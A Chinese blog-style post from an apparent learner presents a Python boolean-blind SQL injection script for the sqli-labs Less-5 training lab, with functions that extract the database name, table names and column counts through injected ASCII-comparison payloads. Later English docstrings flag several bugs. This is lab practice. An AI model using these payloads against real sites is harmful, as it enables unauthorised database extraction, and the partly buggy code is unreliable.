0x00 前言
此脚本基于sqli-labs/Less-5编写,采用ASCII码判断布尔类型,注入标志为"You are in…"。
第一次独立编写完整脚本,感觉很多地方写的不好。条件分支,字典、列表的遍历都花了很长时间去弄
无论是时间复杂度还是代码可读性,感觉都很拉跨。师傅们轻喷。。。
以下是模块解析
0x01 模块
1.判断数据库库名长度
def db_length():
    """Infer the length of the current database name by linear probing.

    One request is sent per candidate length, each asking the sqli-labs
    target whether ``length(database())`` equals the candidate; the loop
    stops at the first response that contains the ``flag`` marker.
    Depends on the module-level ``url`` and ``flag`` and on ``requests``
    (none of them are defined in this block).

    There is no upper bound: if the marker never appears the loop does not
    terminate. Each probe differs only in the numeric literal, so the
    request sequence is easy to recognise in a web-server access log.

    Returns:
        int: the first candidate length whose probe matched.
    """
    candidate = 1
    while True:
        as_text = str(candidate)
        probe = url + "' and length(database())=" + as_text + "--+"
        reply = requests.get(probe)
        if flag in reply.text:
            print("\n当前数据库名长度为:%s" % as_text)
            return candidate
        candidate += 1
2.猜解当前数据库库名
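def db_name():
    """Recover a schema name one character at a time (binary search on ASCII).

    For each position ``i`` in ``1..db_len`` the printable range 32..126 is
    narrowed by a binary search: an equality probe on ``ascii(substr(...))``
    is tried first, and when it does not match a greater-than probe decides
    which half to keep. ``i`` only advances on a matching equality probe, so
    a position whose character never matches keeps looping.

    Fix: the original had a C-style ``//`` line comment before the loop,
    which is a syntax error in Python; it is now a ``#`` comment. Requests,
    printed output and the return value are unchanged.

    Note: the subquery reads ``schema_name ... limit 5,1`` (the sixth schema),
    not ``database()``, whereas ``db_length`` probes ``length(database())`` —
    the two may refer to different schemas.

    Depends on the module-level ``url``, ``flag`` and ``db_len`` and on
    ``requests``.

    Returns:
        str: the characters recovered so far when the loop finishes.
    """
    low = 32
    high = 126
    i = 1
    km = ""
    # Binary search over the ASCII range for every character position.
    while (i <= db_len):
        str_i = '%d' % i
        # Midpoint rounded up on odd sums; with "/" this is a float under
        # Python 3, which "%d" and chr(int(...)) below tolerate.
        if (low + high) % 2 == 0:
            mid = (low + high) / 2
        else:
            mid = (low + high + 1) / 2
        str_mid = '%d' % mid
        name_url = url + "' and ascii(substr((select schema_name from information_schema.schemata limit 5,1)," + str_i + ",1))=" + str_mid + "--+"
        response = requests.get(name_url)
        if flag in response.text:
            km += chr(int(mid))
            print(km)
            i = i + 1
            low = 32
            high = 126
        else:
            # Equality failed: ask whether the character is above mid.
            name_url = url + "' and ascii(substr((select schema_name from information_schema.schemata limit 5,1)," + str_i + ",1))>" + str_mid + "--+"
            response = requests.get(name_url)
            if flag in response.text:
                low = mid
            else:
                high = mid
    print("当前数据库库名为:" + km)
    return km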
3.判断表的个数
def table_num():
    """Count the tables in the schema named by the module-level ``db_name``.

    Probes ``count(table_name)`` for the candidates 0..19 and stops at the
    first response containing the ``flag`` marker. When no probe matches,
    the loop variable keeps its final value, so 19 is returned.

    ``db_name`` is presumably the value bound at module level from
    ``db_name()`` — not visible here; ``url``, ``flag`` and ``requests``
    come from the module as well.

    Returns:
        int: the matched table count, or 19 if nothing matched.
    """
    for count in range(20):
        count_text = str(count)
        probe = (
            url
            + "' and (select count(table_name) from information_schema.tables where table_schema='"
            + db_name
            + "')="
            + count_text
            + "--+"
        )
        if flag in requests.get(probe).text:
            print("\n数据表个数为:%s" % count_text)
            break
    return count
4.判断表名长度
def table_len():
    """Infer the name length of each table found by ``table_num``.

    For table offsets ``0..table_num-1`` the lengths 1..19 are probed with
    ``length(table_name) ... limit <offset>,1``; the first match is appended
    to the result. A table whose length never matches gets no entry, so the
    list can be shorter than ``table_num`` and later offsets shift.

    This block terminates the payload with ``%23`` where the others use
    ``--+``. Depends on the module-level ``url``, ``flag``, ``db_name`` and
    ``table_num`` and on ``requests``.

    Returns:
        list[int]: one matched length per table, in offset order.
    """
    lengths = []
    for offset in range(0, table_num):
        offset_text = str(offset)
        for length in range(1, 20):
            length_text = str(length)
            probe = (
                url
                + "' and (select length(table_name) from information_schema.tables where table_schema='"
                + db_name
                + "' limit "
                + offset_text
                + ",1)="
                + length_text
                + "%23"
            )
            if flag in requests.get(probe).text:
                print("第" + str(offset + 1) + "张表的表名长度为:" + length_text)
                lengths.append(length)
                break
    return lengths
5.递归猜解表名
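def table_name():
    """Recover every table name of the current schema, character by character.

    For each table offset ``i`` the characters ``1..t_len[i]`` are found by
    the same ASCII binary search as ``db_name``: an equality probe, then a
    greater-than probe to pick the half to keep. Results are collected in a
    dict keyed by the 1-based table number as a string, printed as
    ``[+]| n | name`` lines, and returned.

    Fix: the original wrapped the per-table work in
    ``for j in range(table_num): if i == j:``, which executed the body exactly
    once per ``i`` (with ``j == i``); that inner loop is dropped and ``i`` is
    used directly. The requests issued, the printed lines and the returned
    dict are identical.

    Notes:
    - ``t_len[i]`` raises ``IndexError`` if ``t_len`` has fewer entries than
      ``table_num`` (``table_len`` only appends on a match).
    - The subquery filters on ``table_schema=database()`` whereas
      ``table_len`` uses ``table_schema='<db_name>'``.
    - ``mid`` is formatted with ``str()``; under Python 3 ``/`` yields a
      float, so the literal reads e.g. ``79.0`` (``db_name`` uses ``'%d'``).

    Depends on the module-level ``url``, ``flag``, ``table_num`` and
    ``t_len`` (presumably ``table_len()``'s result) and on ``requests``.

    Returns:
        dict[str, str]: table number (1-based, as text) -> recovered name.
    """
    tname = {}
    for i in range(0, table_num):
        str_i = str(i)
        k = 1
        low = 32
        high = 126
        bm = ""
        while (k <= t_len[i]):
            str_k = str(k)
            # Midpoint rounded up on odd sums.
            if (low + high) % 2 == 0:
                mid = (low + high) / 2
            else:
                mid = (low + high + 1) / 2
            str_mid = str(mid)
            name_url = url + "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str_i + ",1)," + str_k + ",1))=" + str_mid + "--+"
            r = requests.get(name_url)
            if flag in r.text:
                bm += chr(int(mid))
                print(bm)
                k = k + 1
                low = 32
                high = 126
            else:
                # Equality failed: ask whether the character is above mid.
                name_url = url + "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str_i + ",1)," + str_k + ",1))>" + str_mid + "--+"
                r = requests.get(name_url)
                if flag in r.text:
                    low = mid
                else:
                    high = mid
        tname[str(i + 1)] = str(bm)
    for key, value in tname.items():
        print("[+]| " + key + " | " + value)
    return tname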
6.判断表中列的个数
def column_num():
    """Count the columns of the table named by the module-level ``table_name``.

    Probes ``count(column_name)`` for the candidates 0..9 (restricted to
    ``table_name`` and ``db_name``) and stops at the first response that
    contains the ``flag`` marker. When no probe matches, the loop variable
    keeps its final value and 9 is returned.

    ``table_name`` and ``db_name`` are presumably string values bound at
    module level — not visible here; ``url``, ``flag`` and ``requests`` come
    from the module as well.

    Returns:
        int: the matched column count, or 9 if nothing matched.
    """
    for count in range(10):
        count_text = str(count)
        probe = (
            url
            + "' and (select count(column_name) from information_schema.columns where table_name='"
            + table_name
            + "' and table_schema='"
            + db_name
            + "')="
            + count_text
            + "--+"
        )
        if flag in requests.get(probe).text:
            print(table_name + "表中列的个数为:%s" % count_text)
            break
    return count